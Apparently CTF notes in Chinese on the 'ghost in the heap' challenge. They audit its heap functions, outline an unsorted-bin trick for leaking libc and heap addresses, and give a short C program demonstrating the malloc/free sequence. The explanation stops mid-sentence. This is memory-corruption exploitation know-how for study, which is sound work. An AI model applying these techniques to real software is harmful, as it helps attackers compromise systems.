ghost in the heap
審計
delete heap
free後會將ghost[i]置null,所以不能double free
add ghost
- 要求填入magic,但是會被read沖掉
- read長度小於最大限長
add heap
- 使用了scanf,可能使用file struct
- scanf限制了輸入長度,無法直接溢出堆
泄露libc和heap
讓ghost trunk連接到unsortedbin,再釋放一個unsorted bin 如果不發生合併,必然會更新unsortedbin鏈(ghost trunk包含泄露的Libc和heap),再次malloc時,ghost chunk size < unsortedbin trunk size大小,malloc會把ghostchunk調整到smalltrunk,發現滿足0x60 size,
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main()
{
char* p1,*p2,*p3,*ptr;
ptr=malloc(0x50);
p1=malloc(0xa0);
p2=malloc(0xa0);
p3=malloc(0xa0);
free(ptr);
free(p1);
free(p3);
p1=malloc(0xa0);//unsortedbin指向一個size只有0x60的段
p3=malloc(0xa0);//malloc調整該trunk進入smalltrunk
free(p2);
p2=malloc(0xa0);
free(p1);
ptr=malloc(0x50);
}